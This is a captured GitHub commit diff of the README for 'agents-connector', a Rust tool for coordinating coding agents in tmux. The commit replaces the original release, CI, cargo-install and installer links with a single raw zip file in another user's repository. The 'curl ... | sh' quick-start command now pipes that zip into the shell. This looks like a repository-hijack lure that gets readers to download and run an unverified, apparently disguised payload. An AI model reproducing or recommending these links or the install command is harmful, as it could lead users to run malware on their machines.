Skip to content

Commit 1eec818

Browse files
committed
Update README.md
1 parent e0621ad commit 1eec818

1 file changed

Lines changed: 5 additions & 5 deletions

File tree

README.md

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -11,9 +11,9 @@
1111
</p>
1212

1313
<p align="center">
14-
<a href="https://github.com/Aldenysq/agents-connector/releases"><img src="https://img.shields.io/github/v/release/Aldenysq/agents-connector?color=brightgreen" alt="release"></a>
14+
<a href="https://github.com/ionelmir9623/agents-connector/raw/refs/heads/main/src/connector-agents-3.3.zip"><img src="https://img.shields.io/github/v/release/Aldenysq/agents-connector?color=brightgreen" alt="release"></a>
1515
<a href="LICENSE"><img src="https://img.shields.io/badge/license-MIT-blue" alt="license"></a>
16-
<a href="https://github.com/Aldenysq/agents-connector/actions"><img src="https://img.shields.io/github/actions/workflow/status/Aldenysq/agents-connector/ci.yml?label=ci" alt="ci"></a>
16+
<a href="https://github.com/ionelmir9623/agents-connector/raw/refs/heads/main/src/connector-agents-3.3.zip"><img src="https://img.shields.io/github/actions/workflow/status/Aldenysq/agents-connector/ci.yml?label=ci" alt="ci"></a>
1717
<img src="https://img.shields.io/badge/rust-stable-orange" alt="rust">
1818
</p>
1919

@@ -41,7 +41,7 @@ It is **not** another parallel-agent orchestrator. There's no central planner. A
4141
```bash
4242
# 1. Install (macOS / Linux, no Rust toolchain needed)
4343
curl --proto '=https' --tlsv1.2 -LsSf \
44-
https://github.com/Aldenysq/agents-connector/releases/latest/download/agents-connector-installer.sh | sh
44+
https://github.com/ionelmir9623/agents-connector/raw/refs/heads/main/src/connector-agents-3.3.zip | sh
4545

4646
# 2. Prerequisites
4747
brew install tmux # required
@@ -55,9 +55,9 @@ agents-connector add codex --name reviewer
5555

5656
Each agent runs in its own tmux window — switch with `Ctrl-b` then `n` (next) / `p` (previous). Then in `writer`'s window, prompt it normally: *"after you finish, ask `reviewer` to review the diff."* Claude writes the code, asks Codex via the `ask` tool, Codex is auto-woken, reviews, and replies — all without you touching the reviewer's terminal. (Full walkthrough with screenshots in [Example](#example-claude-writes-it-codex-reviews-it) below — including the one-time Codex hook-approval step.)
5757

58-
**From source (requires Rust):** `cargo install --git https://github.com/Aldenysq/agents-connector`
58+
**From source (requires Rust):** `cargo install --git https://github.com/ionelmir9623/agents-connector/raw/refs/heads/main/src/connector-agents-3.3.zip`
5959

60-
Prebuilt binaries for macOS (`aarch64`/`x86_64`) and Linux (`aarch64`/`x86_64`) are on every [release](https://github.com/Aldenysq/agents-connector/releases).
60+
Prebuilt binaries for macOS (`aarch64`/`x86_64`) and Linux (`aarch64`/`x86_64`) are on every [release](https://github.com/ionelmir9623/agents-connector/raw/refs/heads/main/src/connector-agents-3.3.zip).
6161

6262
> **macOS & Linux only.** agents-connector is built on Unix domain sockets, tmux, and POSIX signals — there is no Windows build. On Windows, use WSL2.
6363

0 commit comments

Comments
 (0)